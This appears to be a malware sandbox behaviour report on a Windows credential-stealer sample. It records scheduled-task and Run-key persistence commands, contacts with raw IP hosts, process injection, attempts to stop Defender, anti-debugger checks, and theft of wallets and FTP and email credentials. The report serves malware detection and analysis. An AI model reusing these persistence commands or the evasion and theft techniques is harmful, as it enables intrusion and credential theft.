cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Communicates with host for which no DNS query was performed (3 events)

host	117.18.232.200
host	185.215.113.46
host	193.233.132.62

Allocates execute permission to another process indicative of possible code injection (6 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Feb. 20, 2024, 7:52 a.m.	process_identifier: 3952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 20, 2024, 7:52 a.m.	process_identifier: 3952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 20, 2024, 7:52 a.m.	process_identifier: 2176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 20, 2024, 7:52 a.m.	process_identifier: 2176 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 20, 2024, 7:52 a.m.	process_identifier: 3212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 20, 2024, 7:52 a.m.	process_identifier: 3212 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Feb. 20, 2024, 7:52 a.m.	service_handle: 0x005c9ed8 service_name: WinDefend control_code: 1		0	0
ControlService Feb. 20, 2024, 7:52 a.m.	service_handle: 0x005cbd88 service_name: wuauserv control_code: 1		0	0

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 207 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 20, 2024, 7:51 a.m.	class_name: 18467-41 window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (7 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131	reg_value	C:\Users\test22\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini

Potential code injection by writing to the memory of another process (27 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: base_address: 0x000000013f6422b0 process_identifier: 3952 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: base_address: 0x000000013f650d88 process_identifier: 3952 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: I»`#a?Aÿã base_address: 0x0000000076d81590 process_identifier: 3952 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: ] base_address: 0x000000013f650d78 process_identifier: 3952 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: I» a?Aÿã base_address: 0x0000000076d57a90 process_identifier: 3952 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: ] base_address: 0x000000013f650d70 process_identifier: 3952 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: ÏT base_address: 0x000000013f5f0108 process_identifier: 3952 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f64aae8 process_identifier: 3952 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: base_address: 0x000000013f650c78 process_identifier: 3952 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: base_address: 0x000000013f6422b0 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: base_address: 0x000000013f650d88 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: I»`#a?Aÿã base_address: 0x0000000076d81590 process_identifier: 2176 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: A\| base_address: 0x000000013f650d78 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: I» a?Aÿã base_address: 0x0000000076d57a90 process_identifier: 2176 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: A\| base_address: 0x000000013f650d70 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: ÏT base_address: 0x000000013f5f0108 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f64aae8 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: base_address: 0x000000013f650c78 process_identifier: 2176 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: base_address: 0x000000013f6422b0 process_identifier: 3212 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: base_address: 0x000000013f650d88 process_identifier: 3212 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: I»`#a?Aÿã base_address: 0x0000000076d81590 process_identifier: 3212 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: po base_address: 0x000000013f650d78 process_identifier: 3212 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: I» a?Aÿã base_address: 0x0000000076d57a90 process_identifier: 3212 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: po base_address: 0x000000013f650d70 process_identifier: 3212 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: ÏT base_address: 0x000000013f5f0108 process_identifier: 3212 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f64aae8 process_identifier: 3212 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 20, 2024, 7:52 a.m.	buffer: base_address: 0x000000013f650c78 process_identifier: 3212 process_handle: 0x000000000000004c	1	1

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004e4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA Feb. 20, 2024, 7:51 a.m.	key_handle: 0x000004c8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

One or more non-whitelisted processes were created (12 events)

parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=916 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3192 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2276 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=604 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e8f1e8,0x7fef3e8f1f8,0x7fef3e8f208
